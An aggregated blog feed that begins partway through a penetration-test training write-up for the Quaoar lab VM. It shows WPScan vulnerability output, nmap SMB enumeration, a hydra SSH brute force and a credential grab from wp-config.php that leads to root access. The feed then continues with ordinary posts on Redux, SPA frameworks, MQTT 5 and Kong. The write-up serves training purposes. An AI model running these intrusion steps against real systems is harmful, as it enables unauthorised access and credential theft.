[!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation 
Reference: https://wpvulndb.com/vulnerabilities/8815 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC Reference: https://wpvulndb.com/vulnerabilities/8816 
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/ 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks 
Reference: https://wpvulndb.com/vulnerabilities/8817 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF 
Reference: https://wpvulndb.com/vulnerabilities/8818 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS 
Reference: https://wpvulndb.com/vulnerabilities/8819 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF 
Reference: https://wpvulndb.com/vulnerabilities/8820 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8905
[...]
[i] Fixed in: 3.9.20

[!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
Reference: https://wpvulndb.com/vulnerabilities/8906
[...]
[i] Fixed in: 4.7.5

[!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8910
[...]
[i] Fixed in: 3.9.20

[!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
Reference: https://wpvulndb.com/vulnerabilities/8911
[...]
[i] Fixed in: 3.9.20

[!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
Reference: https://wpvulndb.com/vulnerabilities/8941
[...]
[i] Fixed in: 3.9.21

[+] WordPress theme in use: twentyfourteen - v1.1

[+] Name: twentyfourteen - v1.1
| Last updated: 2017-06-08T00:00:00.000Z
| Location: http://192.168.99.101/wordpress/wp-content/themes/twentyfourteen/
[!] The version is out of date, the latest version is 2.0
| Style URL: http://192.168.99.101/wordpress/wp-content/themes/twentyfourteen/style.css
| Referenced style.css: wp-content/themes/twentyfourteen/style.css
| Theme Name: Twenty Fourteen
| Theme URI: http://wordpress.org/themes/twentyfourteen
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
| Author: the WordPress team
| Author URI: http://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Mon Nov 6 21:55:37 2017
[+] Requests Done: 49
[+] Memory used: 32.5 MB
[+] Elapsed time: 00:00:03

Ok, that’s quite a lot of information. To process. But before focussing too much on wordpress, we’ll stick to enumeration for now. Let’s take a look at the samba-shares.

Samba

Enumerate the users first. Luckily, there’s a nmap-script for that:

$ nmap --script smb-enum-users.nse -p 445 $IP

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 21:58 CET
Nmap scan report for 192.168.99.101
Host is up (0.00089s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-enum-users:
| QUAOAR\nobody (RID: 501)
| Full name: nobody
| Description:
| Flags: Normal user account
| QUAOAR\root (RID: 1001)
| Full name: root
| Description:
| Flags: Normal user account
| QUAOAR\viper (RID: 1000)
| Full name: viper
| Description:
| Flags: Normal user account
| QUAOAR\wpadmin (RID: 1002)
| Full name:
| Description:
|_ Flags: Normal user account

Ok. So we see some usernames: nobody, root, viper and wpadmin. We’ll take note of them. Now we can check if there are any shares accessible:

$ nmap --script smb-enum-shares.nse -p 445 $IP

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 22:01 CET
Nmap scan report for 192.168.99.101
Host is up (0.00067s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-enum-shares:
| account_used: guest
| \\192.168.99.101\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Quaoar server (Samba, Ubuntu))
| Users: 1
| Max Users:
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\192.168.99.101\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users:
| Path: C:\var\lib\samba\printers
| Anonymous access:
|_ Current user access:

Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds

This looks like we’re on to something here. A guest share with read/write access! We can now try to connect to that share!

$ smbclient //$IP/IPC$ -N

The prompt changes. Looks like we’re in!

smb: \>

Unfortunately, we can’t do anything on here:

smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*

Let’s leave that trace for now. We gathered quite a lot of information already and can try to gain access with the information.

Attack

With everything we discovered so far, we’re ready to take hydra for a spin and check if we already have valid credentials. Hydra is a login cracker that supports a lot of common protocols. The

info.txt

is the file where I saved everything that looked like a user account or a possible password during enumeration.

$ hydra -L info.txt -P info.txt -u $IP ssh -t 4
[22][ssh] host: 192.168.99.101 login: wpadmin password: wpadmin

Ok, we got our entry point!

$ ssh wpadmin@$IP

Let’s check if we have any interesting groups assigned.

$ id
uid=1001(wpadmin) gid=1001(wpadmin) groups=1001(wpadmin)

Nothing. But we have our first flag.

$ ls
flag.txt
$ cat flag.txt
2bafe61f03117ac66a73c3c514de796e

It’s safe to assume the user wpadmin has at least read-rights for the wordpress installation. Let’s check it out and see if we get some more information!

cd /var/www/wordpress
cat wp-config.php | grep DB_
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');

Another password, great! Let’s see, if this is the real root password for this box:

$ ssh root@$IP
root@192.168.99.101's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

* Documentation: https://help.ubuntu.com/

System information as of Mon Nov 6 18:40:50 EST 2017

System load: 0.47 Processes: 95
Usage of /: 29.9% of 7.21GB Users logged in: 0
Memory usage: 32% IP address for eth0: 192.168.99.101
Swap usage: 0% IP address for virbr0: 192.168.122.1

Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com

OK, let’s see.

root@Quaoar:~# ls
flag.txt vmware-tools-distrib

Now we have the second flag.

root@Quaoar:~# cat flag.txt 8e3f9ec016e3598c5eec11fd3d73f6fb

Learnings

We got it. Time to take a step back and have a look what we learned during the penetration test of this VM:

  • Enumeration is key. There’s a lot information hidden in plain sight.
  • If you’re running any sort of service, don’t reuse passwords.
  • Disable everything you do not need on your systems.

The post Penetration Test Training – Quaoar appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Developing modern offline apps with ReactJS, Redux and Electron – Part 3 – ReactJS + Redux

codecentric Blog - Sat, 02-Dec-17 23:00

In the last article we introduced you to the core features and concepts of React. We also talked about the possibility to save data in the component state, pass it to child components and access the data inside a child component by using props. In this article we will introduce Redux, which solves the problem of storing your application state.

 

  1. Introduction
  2. ReactJS
  3. ReactJS + Redux
  4. Electron framework
  5. ES5 vs. ES6 vs. TypeScript
  6. WebPack
  7. Build, test and release process

Once a component needs to share state with another component, that it does not have a parent-child relationship with, things start to get complicated. The following diagram visualizes that problem. On the left hand side, you see a tree of React components. Once a component initiates a state change, this change needs to be propagated to all other components that rely on the changed data.

This is where Redux comes in handy. Redux is a predictable state container for JavaScript apps. The state is kept in one store and components listen to the data in the store that they are interested in.

Flux pattern

Redux implements the Flux pattern that manages the data flow in your application. The view components subscribe to the store and react on changes. Components can dispatch actions that describe what should happen. The Reducers receive these actions and update the store. A detailed explanation of the four parts of the flux pattern in Redux is given in the next sections.

Redux

The Redux state stores the whole application data in one object tree that is accessible from every component of the application. In our example the state contains a small JavaScript object, as you can see in the following code snippet.

const state = {
  isModalOpen: false,
  clipboard: {
    commands[]
  } 
}

The state is immutable and the only way to change it, is to dispatch an action.

Action

Actions are plain JavaScript objects consisting of a mandatory TYPE property to identify the action and optional information. The type should be a string constant that is stored in a separate module to obtain more clarity. There are no naming specifications for the implementation of the object with the additional information. The following example action sets the value of isModalOpen to false.

actionConstants.js
const SET_MODAL_OPEN = ‘SET_MODAL_OPEN’;
modalAction.js
{
  type: SET_MODAL_OPEN,
  payload: false
}

Alternatively you can use an action creator, to create the action. They make the action more flexible and easy to test. In our example we use one action, to set isModalOpen variable to false or true.

function setModalOpen(isModalOpen) {
  return {
    type: SET_MODAL_OPEN,
    payload: isModalOpen
  };
}

The question remains, how you can trigger the action. Answer: Simply pass the action to the dispatch() function.

dispatch(setModalOpen(false));

Alternatively you can use a bound action creator that dispatches the action automatically, when you call the function. Here is an example for that use case:

Bound Action Creator
const openModal = () => dispatch(setIsModalOpen(true));

So far we can dispatch an action that indicates that the state has to change, but still the state did not change. To do that we need a reducer.

Reducer

“Reducers are just pure functions that take the previous state and an action, and return the next state.” [REDUCER]

The reducer contains a switch statement with a case for each action and a default case which returns the actual state. It is important to note that the Redux state is immutable, so you have to create a copy from the state that will be modified. In our projects we use the object spread operator proposal, but you can also use Object.assign(). The following example sets isModalOpen to the value of the action payload and keeps the other state values.

Object spread operator Object.assign()
function modal(state, action) {
  switch (action.type) {
    case SET_MODAL_OPEN: 
      return {
        ...state,
        isModalOpen: action.payload
      })
      default:
        return state
    }
}
function modal(state, action) {
  switch (action.type) {
    case SET_MODAL_OPEN: 
      return Object.assign({}, state, {
        isModalOpen: action.payload
      })
    default:
      return state
  }
}

The Reducer can either take the previous state if one exists or the optional initial state to define a default on the store properties. In our example we configure that the modal should be closed initially.

const initialState = {
  isModalOpen: false
};

function modal(state = initialState, action) {
  switch (action.type) {
    case SET_MODAL_OPEN: 
      return {
        ...state,
        isModalOpen: action.payload
      })
    default:
      return state
   }
}

The number of reducers can become very large, thus it is recommended to split the reducers into separate files, keep them independent and use combineReducers() to turn all reducing functions into one, which is necessary for the store creation.

Store

We have already talked a lot about the store, but we have not looked at how to create the store. Redux provides a function called createStore() which takes the reducer function and optionally the initial state as an argument. The following code snippets show how to combine multiple reducers, before creating the store.

One reducer
import { createStore } from 'redux';

const initialState = {
  isModalOpen: false,
  clipboard: {
    commands[]
  } 
};

let store = createStore(modalReducer, initialState);
Two combined reducer
import { createStore, combineReducers } from 'redux'; 

const initialState = {
  isModalOpen: false,
  clipboard: {
    commands[]
  } 
};

const reducer = combineReducers({
  clipboardReducer,
  modalReducer
});

let store = createStore(reducer, initialState);

Usage with React

We showed how to create and manipulate the store, but we did not talk about how a component access the store. The component can use store.subscribe() to read objects of the state tree, but we suggest to use the React Redux function connect(), which prevents unnecessary re-renders.

The function connect() expects two functions as arguments, called mapStateToProps and mapDispatchToProps. Decorators are part of ES7 which we cover in blog article 5 on “ES5 vs. ES6 vs. TypeScript”.

With a decorator (ES7) Without a decorator
@connect(mapStateToProps, mapDispatchToProps)

class App extends React.Component {
  render() {
    return (
      <div>
        Count: {this.props.counter}
      </div> 
     );
  }
}


class App extends React.Component {
  render() {
    return (
      <div>
        Count: {this.props.counter}
      </div> 
    );
  }
}

export default connect(
  mapStateToProps, 
  mapDispatchToProps)(App);

mapDispatchToProps defines which actions you want to be able to trigger inside your component. For example we want the Modal to inject a prop called onSetModalOpen, which dispatches the SET_MODAL_OPEN action. If the action creator arguments match the callback property arguments you can use a shorthand notation.

mapDispatchToProps Shorthand notation
const mapDispatchToProps = dispatch => ({
  onSetModalOpen(value) {
    dispatch(setModalOpen(value));
  }
});

connect(mapStateToProps, mapDispatchToProps)(App);
connect(
  mapStateToProps, 
  {onSetModalOpen: setModalOpen}
)(App);



mapStateToProps defines how to convert the state to the props you need inside your component.

const mapStateToProps = state => ({
  isModalOpen: state.modal.isModalOpen,
  clipboard:   state.clipboard    
});

To handle the growing complexity of the store as you write business applications, we recommend to use selectors that are functions that know how to extract a specific piece of data from the store. In our small example selectors do not offer much benefit.

Selector mapStateToProps
const getModal = (state) => {
  return state.modal;
};

const getIsModalOpen = (state) => {{
  return getModal(state).isModalOpen;
};
const mapStateToProps = state => ({
  isModalOpen: getIsModalOpen(state),
  clipboard:   getClipboard(state)
});



Debugging using the Console Logger

Redux provides a predictable and transparent state, that only changes after dispatching an action. To isolate errors in your application state you can use a middleware like redux-logger instead of manually adding console logs to your code.  The following code snippet shows how to configure the default redux logger.

import { applyMiddleware, createStore } from 'redux';
import { logger } from 'redux-logger';
const store = createStore(
  reducer,
  applyMiddleware(logger)
);

When running your React application the redux logger will print the actions to your browser console. By default you see the action name and you can collapse each action to see more details.


In the details view the redux logger shows the previous state of the redux store, then the action with the payload you triggered and after that next state with the new state.

 

Redux logger provides various configuration options. You can specify which entries should be collapsed by default, or which actions should not be logged to the console, just to name a few.

import { applyMiddleware, createStore } from 'redux';
import { logger } from 'redux-logger';
const logger = createLogger({
  collapsed: (getState, action, logEntry) => !logEntry.error,
  predicate: (getState, action) => 
    action  && action.type !== ‘SET_LINES’
});

const store = createStore(
  reducer,
  applyMiddleware(logger)
);

Summary

In this article we showed how useful Redux is to manage the state of applications. The simple flux pattern scales extremely well also for large applications and we did not run into any critical performance issues so far in our projects. In the next article we will introduce Electron and show how to package our React/Redux web app as a cross platform desktop application. Stay tuned

Categories: Agile, Java, TDD & BDD

Angular – bane of my SPA?

codecentric Blog - Fri, 01-Dec-17 03:45

When it comes to SPAs (Single Page Applications), very often you hear “Angular” in the same or the following sentence. Due to my projects, I worked with a couple of other frameworks for SPAs this year. Here’s what I learned about those frameworks and how they differ.

Angular

The Angular family is mainly developed and maintained by Google. They are very popular, if not the most popular, frameworks for Single Page Applications. Angular has been on the market for quite a few years. It has undergone several minor and major changes in its history. Angular versions up to, but not including, 2.0 are referred to as AngularJS, while newer versions are plainly called Angular.

One of the more interesting changes in AngularJS came in version 1.5 with the introduction of the component model. Components are custom HTML tags with arbitrary content. Before version 1.5 you would’ve used AngularJS directives to achieve the same functionality. The component model unified the way components are built and how the interact with other components. Last but not least, the introduction of the component model was a step into the direction of the mindset of Angular 2, where components behave similarly. Therefore using components held the promise to make the migration to Angular 2 easier.

Angular version 2 (or newer) is a redevelopment using TypeScript, a superset of JavaScript. TypeScript brings type safety and lots of improvements for object-oriented programming to the table. Using these features, the new Angular encapsulates more functionality into classes instead of arbitrary JavaScript code. Due to the feature richness of AngularJS and Angular the frameworks are quite heavy. Very few projects will ever use Angular to its full potential.

The module system of Angular is interesting for enterprise size applications. With it you can define reusable bundles of multiple components, directives and/or services.

Aurelia

Aurelia is a lighter alternative to Angular. The main contributor and maintainer is Rob Eisenberg, who is a senior employee at Microsoft. Being a Microsoft employee shouldn’t have much of an impact on the development of the framework. However Microsoft’s endorsement of the framework lets one hope that the framework will have an extended support lifespan. Aurelia uses convention over configuration, which allows a very quick start with your development.

What makes Aurelia special is that you write very clean JavaScript code. The binding between template and controller class methods and fields works out of the box via naming convention. To make this magic happen, the only caveat is that your controller and template files must have the same filename and should be in the same directory. Aurelia is light and concentrates on ease of use. This is achieved by using easy-to-understand conventions. Everything that exceeds the functionality of aurelia can be added via the thousands of libraries from the NPM (Node Package Manager) repository. By using this approach, your SPA only contains the functionality you manually add which keeps your webapp nicely slim.

Vue

Vue is another candidate for lightweight Single Page Application frameworks. Binding between template and controller is reminiscent of Angular semantically, which helps get used to Vue when you come from an Angular background. A speciality of Vue is that you can put template, controller and styles into the same, so-called ‘.vue’ file. This helps reduce the mess that comes with having styles, controllers and templates in different files and directories. To enable this in a meaningful way, vue-files contain up to three default sections. When you write an extension for the pre-processor, you can even add more sections, e.g. for translations in the same file.
Vue, like Aurelia, is easy to set up and allows you to be productive very fast. Like Aurelia, it doesn’t come with a lot of extra features that are not UI related. Add those from the NPM repository as you need them.

React

React is developed by Facebook and has a history of license disputes. The main issue with the license was that Facebook reserved a right over its intellectual property, which could in a conflict situation allow Facebook to revoke/suspend the open source nature of React. Facebook has since resolved the license issues by re-licensing several libraries, including react, under a standard MIT license in September 2017.

React alone is not an SPA framework. React’s primary concern is to push JavaScript changes from the code behind to the Browser without reloading the page. To have state changes propagate from the browser to the code behind the Redux framework has proven to be the community’s choice. React uses JSX which allows putting HTML tags and dynamic content right inside your JavaScript code. React’s focus is building the view layer with its component system. For features that other frameworks offer out-of-the-box, e.g. data binding, you have to bundle other libraries. This gives you more flexibility, but decisions must be made, which is not easy when starting with a new technology.

Conclusion

All of the frameworks discussed above have their purposes. There is no such thing as THE best Single Page Application framework because your choice should consider the strengths and weaknesses of each of these frameworks.
If you want to squeeze the last bit of performance out of your app and you want control over what is happening and when, you should go for React. For a quick and uncomplicated start, you can rely on Aurelia and Vue. Both don’t add as much boilerplate as Angular while still taking care of everything that makes web front end development difficult. When you know that your application is going to be big and you’ll need lots of functionality, Angular could be the right choice for you.

AngularJS is still a viable option for smaller apps, but for serious business apps you should go with Angular 5 and TypeScript. Just be aware of the steep learning curve that the two will impose on your team. Generally speaking, bigger applications can profit from the added complexity of TypeScript. It is, however, difficult to decide at what point JavaScript adds more maintenance cost than TypeScript would have added to the initial development.
Flow offers a lighter alternative to TypeScript if you don’t want to break a fly on a wheel. Flow will give you type safety within the “normal” JavaScript syntax..

Disclosure

With the exception of AngularJS and Vue, I have no more than a few weeks of experience with the frameworks introduced above. I still wanted to share my insights into them. When it comes to Vue or Aurelia, my personal preference is Vue. I tried both with a very simple test component. My project had unit and end-to-end tests to allow for test-driven development. To allow my tests to run with Aurelia I first had to modify the Aurelia test classes. I’ve been happy with Vue ever since I started using it at the beginning of this year.

Still undecided? There’s an in-depth article series on sitepen.com that concludes with a summary here.

What are your experiences with the frameworks mentioned above? Are there any other frameworks you recommend to take a look at? Please let me know.

More resources / ecosystem compilations for the frameworks

https://github.com/AngularClass/awesome-angular
https://curated.vuejs.org/
https://github.com/vuejs/awesome-vue
https://github.com/behzad888/awesome-aurelia
https://github.com/chentsulin/awesome-react

The post Angular – bane of my SPA? appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Hello MQTT Version 5.0!

codecentric Blog - Thu, 30-Nov-17 13:28

On August 9, 2017, the OASIS MQTT Technical Committee announced that MQTT Version 5.0 is now available for public review and comment until September 8th. And the release of the next version of Message Queue Telemetry Transport (MQTT) is expected by end of this year.

Time to have a closer look at what’s new.

MQTT v5.0 is the successor of MQTT 3.1.1 (find out why it’s not MQTT 4).

Most likely important: MQTT v5.0 is not backward compatible (like v3.1.1). Obviously too many new things are introduced so existing implementations have to be revisited.

According to the specification, MQTT v5.0 adds a significant number of new features to MQTT while keeping much of the core in place.

The major functional objectives are:

  • Enhancements for scalability and large scale systems in respect to setups with 1000s and millions of devices.
  • Improved error reporting (Reason Code & Reason String)
  • Formalize common patterns including capability discovery and request response
  • Extensibility mechanisms including user properties, payload format and content type
  • Performance improvements and improved support for small clients

My MQTT v5.0 Highlights

User Properties

User properties (UTF-8 encoded Strings) can be part of most MQTT packets: PUBLISH and CONNECT, and to all packets with a Reason Code.
User properties on PUBLISH are forwarded with the message and are defined by the client applications. They are forwarded by the server to the receiver of the message.
User properties on CONNECT and ACKs are defined by the sender, are unique to the sender implementation, and are not defined by MQTT.
An unlimited number of user properties can be added!

Payload Format Indicator & Content Type 

Another identifier/value pair is available for use when sending a PUBLISH message. This is the Payload Format indicator. If present and set to 1, this indicates that the PUBLISH payload is UTF-8 encoded data. If set to 0, or if the indicator is not present, then the payload is an unspecified byte format, exactly as with MQTT v3.1.1.

  • Optional part of PUBLISH message
  • Reason Codes for ACK messages available if payload format is invalid
  • Receiver may validate the format indicator
  • „Content Type“ optional header can carry a MIME type
  • Payload Format Indicator“ can be binary or UTF-8

Shared Subscriptions

With support of shared subscriptions, Client Load Balancing is now included in MQTT. The message load of a single topic is distributed amongst all subscribers (this was already supported by HiveMQ for MQTT 3.1 & MQTT 3.1.1).

MQTT Shared Subscriptions

A Shared Subscription is identified using a special style of Topic Filter.

The format of this filter is:

$share/{ShareName}/{filter} 

$share – is a literal string that marks the Topic Filter as being a Shared Subscription Topic
{ShareName} – is a character string that does not include “/”, “+” or “#”
{filter} – is the remainder of the string has the same syntax and semantics as a Topic Filter in a non-shared subscription.

Reason Codes & Reason Strings

With MQTT v5.0, Reason Codes and Reason Strings are introduced at application level. Now clients are allowed to figure out why they were disconnected.
Almost all control packets like CONNACK, PUBACK, PUBREC, PUBREL, UNSUBACK, DISCONNECT, SUBACK and AUTH can carry Reason Codes in their variable header.
But: Reason Codes are optional, the server/broker can still decide to just disconnect or reject the clients like in MQTT v3.1.1, e.g. for security reasons.
In addition to the Reason Code a Reason String can be associated with the response to provide a more human readable message.

Session management: Session Expiry & Message Expiry

Support of offline/persistent sessions is a major feature of MQTT to handle connection interrupts. The specification of MQTT v3.1.1 does not define a mechanism to control the expiry of a persistent session. Thus it will never expire and it will never be deleted (aside from some brokers like HiveMQ which already supports session expiry with MQTT v3.1.1).
In MQTT v3.1.1 and earlier, a client can control how the server handles the client session (a session means the subscriptions of a client and any queued messages) via the „clean session“ flag. If set to 1, the server would delete any existing session for that client and would not persist the session after disconnecting. If set to 0, the server would restore any existing session for a client when it reconnected, and persist the session when the client disconnected.

“Clean Session” is now split into „Clean Start“. If Clean Start is set to 1 it indicates that the session should start without using an existing session (otherwise session information is kept), and a Session Expiry interval which says how long to retain the session after a disconnect.

  • Session Expiry is an optional part of the CONNECT message (3.1.2.11.2 Session Expiry Interval) and the DISCONNECT control packet  (3.14.2.2.2 Session Expiry Interval). If the the Session Expiry Interval is absent in the DISCONNECT message, the Session Expiry Interval in the CONNECT packet is used. It defines the session expiry Interval in seconds. If set the Broker expires the session after the given interval as soon as the client disconnects. Setting of Clean Start to 1 and Session Expiry Interval to 0 is equivalent in MQTT v3.1.1 of setting Clean Session to 1.
  • Message expiry is an optional part of the PUBLISH control packet (3.3.2.3.3 Publication Expiry Interval). The Publish Expiry Interval applies to online and queued messages and is the lifetime of the publication in seconds.

Another issue to be addressed under this banner is called Simplified State Management.
This has at least two major advantages.

  1. As an application, I only want my session state to be discarded when I’ve completed all my work, not when my network connection fails. This was inconveniently hard in all previous versions of MQTT – not in version 5.
  2. The ability for session state to have an expiry time. If the client does not connect within a certain amount of time, the session state can be deleted by the server. This obviates the need for a client to reconnect just to clean up session state.

Repeated topics when publishing

When publishing data to a single topic, a new feature will help reduce bandwidth use. A client or server can set the topic in a PUBLISH message to be a zero length string. This tells the client/server being published to, to use the previous topic instead. This goes some way to reducing the current overhead associated with publishing – a shame it isn’t quite as good as the registered topics available in MQTT-SN.

Publication Expiry interval

This is an identifier/value pair for use when publishing. If present, this value is a 4 byte integer which gives the number of seconds for which the server will attempt to deliver this message to a subscriber. This means that an offline client with messages being queued may not receive all of the messages when it reconnects, due to some of them expiring. Interestingly, when the server does deliver a message that had a Publication Expiry set, it sets the Publication Expiry on the outgoing message to the client but with the amount of time that there is left until the message expires. This means that the true time to expiry will propagate through bridges or similar.

Publish Reason Codes

The PUBACK and PUBREC packets have a new entry in their variable header which is the Publish Reason Code. This can be used to tell the client a message has been:

  • refused for various reasons
  • accepted, or
  • accepted with no matching subscribers.

For the PUBREC packet, if the message is refused or accepted with no matching subscribers then there is no expectation for the PUBREL/PUBCOMP messages to be sent for that message.
The PUBCOMP packet also has a similar entry which has the same set of Reason Codes and an additional one for the case when a message had expired.
This is for the case when a client reconnects with clean start set to 0 and it has a QoS 2 message part way through its handshake, but the server has already expired the message.
There is still no way to tell a client that its QoS 0 message was refused but for a good reason: QoS 0 Messages do not get an acknowledgement -> no piggybacking of Reason Codes!

Disconnect notification

In MQTT v3.1.1 and before, only the client sends a DISCONNECT packet.
In MQTT v5.0, either the client or the server can send DISCONNECT, and it is used to indicate a reason for disconnection.
Examples for the new disconnect reason codes:

Disconnect Reason Codes

Client implementations

Currently there is no ready-to-use MQTT v5.0 client implementation available. I think a production-ready version will not be available until mid-2018.

Anyway as soon as client implementations are available I am looking forward to adding support for the new Version 5.0 features into MQTT.fx (www.mqttfx.org) in time.

Links

OASIS Message Queuing Telemetry Transport (MQTT) TC

https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=mqtt

Latest specification version

http://docs.oasis-open.org/mqtt/mqtt/v5.0/

MQTT.fx

http://www.mqttfx.org

The post Hello MQTT Version 5.0! appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

API management with Kong

codecentric Blog - Thu, 23-Nov-17 01:15

Utilising APIs to foster innovation and to create new business opportunities is not a new concept. A lot of success stories from eBay, Netflix, Expedia, mobile.de, and many others show the growing trend of API-driven business models. Most of the vendors for API management solutions are well-known players, such as IBM, Oracle, or MuleSoft, that try to provide a solution coupled to their existing ecosystem of enterprise products. One of the few exceptions is Kong Inc (formerly known as Mashape Inc), a San-Fransisco-based startup that became popular in the last two years by open-sourcing their core business product: Kong API gateway. In this article, I will briefly introduce the topic of API management and show how to bootstrap and use Kong API gateway.

Why does API management matter?

Adaptation and speed have become the key success factors in the software industry. We can see the results of this trend in the emergence of microservices architectures, continuous delivery, DevOps culture, agile software development, and cloud computing. In order to be fast, you have to split a system into encapsulated services and be able to change each part of the system in an instant. This trend also results in high demand for integration solutions between different applications and services. API management plays an important role in this integration by providing clear boundaries and abstractions between systems. Today we generate value by combining different services instead of building our own solutions. This is why cloud computing and SaaS applications are very popular. With the growing trend of APIs, many companies adjusted their business model, and some even moved to an API-centric business approach completely. Expedia Inc generates 90% of the revenue through Expedia Affiliate Network, an API platform. Netflix has built an ecosystem of over 1000 APIs to support multiple devices for their streaming platform. Salesforce, one of the fastest growing CRM vendors generates over 50% of their revenue with APIs. Other common uses cases for APIs are:

  • reach users or acquire content
  • generate traffic
  • expand partner network
  • find new business opportunities
  • create new revenue streams
  • support multiple devices
  • create flexibility for internal projects
  • provide integration capabilities with other systems

But utilising APIs is not easy and it comes with a price. The cost for the mentioned benefits is an increasing technical and organisational complexity. In this blog post we will explore ways to tackle the technical complexity and how Kong API gateway can help deal with it.

Kong Architecture

Kong is an open source API gateway to manage RESTful APIs. It is part of Kong Enterprise, a bundle of Kong API gateway, a developer portal called Gelato and an analytics platform by the name of Galileo. It is aimed for enterprise customers that run thousands of APIs and require dedicated 24/7 support. For small to medium-sized companies, Kong API gateway (community edition) will suffice to make first steps in API management.

api management kong architecture


Kong Architecture with five core components.

The five components of Kong architecture are: nginx, OpenResty, Datastore, plugins and a RESTful admin API. The core low-level component is nginx, a well-known and rocksolid web server. By 2017 35.5% of all known and 54.2% of top 100,000 websites worldwide use nginx. It can handle up to 10,000 simultaneous connections on one node with low memory footprint and is often used as a reverse proxy in microservice architectures, a load balancer, SSL termination proxy, or a static content web server. Apart from these use cases, nginx has many more features which deserve their own blog posts. OpenResty is a web platform that glues nginx core, LuaJIT, Lua libraries and third-party nginx modules to provide a web server for scalable web applications and web services. It was originally built by taobao.com, the biggest online auction platform in Asia with 369 million active users (2017) and donated in 2011. After that, Cloudflare Inc. supported and developed the platform until 2016. Since then, the OpenResty Software Foundation has ensured the future development of the platform. The datastore component uses Apache Cassandra or PostgreSQL to handle the storage of the configuration data, consumers, and plugins of all APIs. The API configuration is also cached within nginx, so the database traffic should be low. Plugins are Lua modules that are executed during a request/response lifecycle. They enrich the API gateway with functionalities for different use cases. For instance, if you want to secure your API, you would use a security plugin dedicated to providing only this functionality during the request. The Kong plugin system is open and you can write your own custom plugins. Finally, there is a RESTful admin API to manage the APIs. It may feel strange at the beginning to have no user interface. From a developer perspective, this is actually nice, because it provides a necessary tool to automate your workflows, for example with Postman, httpie or curl. Working with Kong for several months now, I have never felt the need to have a user interface because I could access all information in a fast and reliable way. But if you want to have a nice dashboard for your APIs you can use Konga or kong-dashboard, both free and open source community projects.

Now let’s see how to manage APIs with Kong and which plugins provide basic security features.

Kong API gateway in action

This part will be more technical than the previous. First, I will show you how to create a minimal infrastructure for Kong API gateway. Then I will add an API and a security plugin to restrict the access to a specific user.

To start the infrastructure, I will use docker-compose with this service definition:

version: '2.1'

services:
  kong-database:
    container_name: kong-database
    image: postgres:9.4
    environment:
      - POSTGRES_USER=kong
      - POSTGRES_DB=kong
    healthcheck:
      test: ["CMD", "pg_isready", "-U", "postgres"]
      interval: 10s
      timeout: 5s
      retries: 5
  
  kong-migration:
    image: kong
    depends_on:
      kong-database:
        condition: service_healthy
    environment:
      - KONG_DATABASE_postgres
      - KONG_PG_HOST=kong-database
    command: kong migrations up

  kong:
    container_name: kong
    image: kong:0.11.0
    depends_on:
      kong-database:
        condition: service_healthy
      kong-migration:
        condition: service_started
    environment:
      - KONG_DATABASE=postgres
      - KONG_PG_HOST=kong-database
      - KONG_PG_DATABASE=kong
    expose:
      - 8000
      - 8001
      - 8443
      - 8444
    ports:
      - "8000-8001:8000-8001"
    healthcheck:
      test: ["CMD-SHELL", "curl -I -s -L http://127.0.0.1:8000 || exit 1"]
      interval: 5s
      retries: 10

You can also install Kong on many different platforms such as AWS, Google Cloud, Kubernetes, DC/OS and many others. In my docker-compose definition, there are three services: kong-database, kong and kong-migration. I use the PostgreSQL Docker image for the Datastore component that was mentioned in the architecture overview, but you can use Cassandra as well. The kong-service exposes four different ports for two functionalities:

  • 8000, 8443: HTTP & HTTPS access to the managed APIs (consumer endpoint)
  • 8001, 8444: HTTP & HTTPS access to the admin API (administration endpoint)

The kong-migration service is used to create the database user and tables in kong-database. This bootstrap functionality is not provided by the kong-service, so you need to run kong migrations up within the container only once. With docker-compose up the services will be up and running. Your docker ps command should output something like this:

CONTAINER ID        IMAGE               COMMAND                  CREATED                  STATUS                            PORTS                                                                NAMES
